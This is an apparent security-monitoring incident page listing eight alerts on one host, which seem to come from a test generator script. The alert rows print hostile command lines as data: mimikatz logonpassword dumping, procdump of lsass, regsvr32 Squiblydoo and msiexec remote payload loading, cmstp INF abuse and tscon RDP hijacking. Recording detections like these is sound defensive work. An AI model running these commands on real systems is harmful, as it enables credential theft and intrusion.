Back to list

Incident Overview

Incident ID CINC-20251220-F32E54CC
Severity Medium (70)
Status new
Alert Count 8
Host Count 1

Timeline

First Seen 2025-12-18 20:19:23
Last Seen 2025-12-18 20:20:34
Duration 0d 0h 1m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Credential Access Persistence Defense Evasion Lateral Movement Execution
Techniques:
OS Credential Dumping Event Triggered Execution Regsvr32 CMSTP Remote Desktop Protocol User Execution

Affected Hosts (1)

BOOK-R0BE6S1NC3

Related Alerts (8)

Severity Status Hostname Description Tactic Command Line Time
High new BOOK-R0BE6S1NC3 A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further. Credential Access C:\windows\system32\cmd.exe /c "powershell sekurlsa::logonpasswords" 12-18 20:20
High new BOOK-R0BE6S1NC3 Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 20:20
High new BOOK-R0BE6S1NC3 A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 20:20
High new BOOK-R0BE6S1NC3 A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs andor COM scriptlets SCT from remote servers. Review the command line. Defense Evasion cmstp /s /ns C:\Users\ubuntu\AppData\Local\Temp\test.inf 12-18 20:20
High new BOOK-R0BE6S1NC3 An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\windows\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\ubuntu\AppData\Local\Temp\lsass.dmp" 12-18 20:20
High new BOOK-R0BE6S1NC3 An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\windows\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\ubuntu\AppData\Local\Temp\lsass.dmp" 12-18 20:20
High new BOOK-R0BE6S1NC3 A command line indicates an attempt to hijack a remote desktop protocol session. Review the process tree. Lateral Movement C:\windows\system32\cmd.exe /c "tscon 1 /dest:rdp-tcp#0" 12-18 20:20
Informational new BOOK-R0BE6S1NC3 A process has written a known EICAR test file. Review the files written by the triggered process. Execution "C:\app\cortex-xdr-siem-test\.venv\Scripts\python.exe" mega_incident_generator.py --rounds 2 --interval 30 12-18 20:19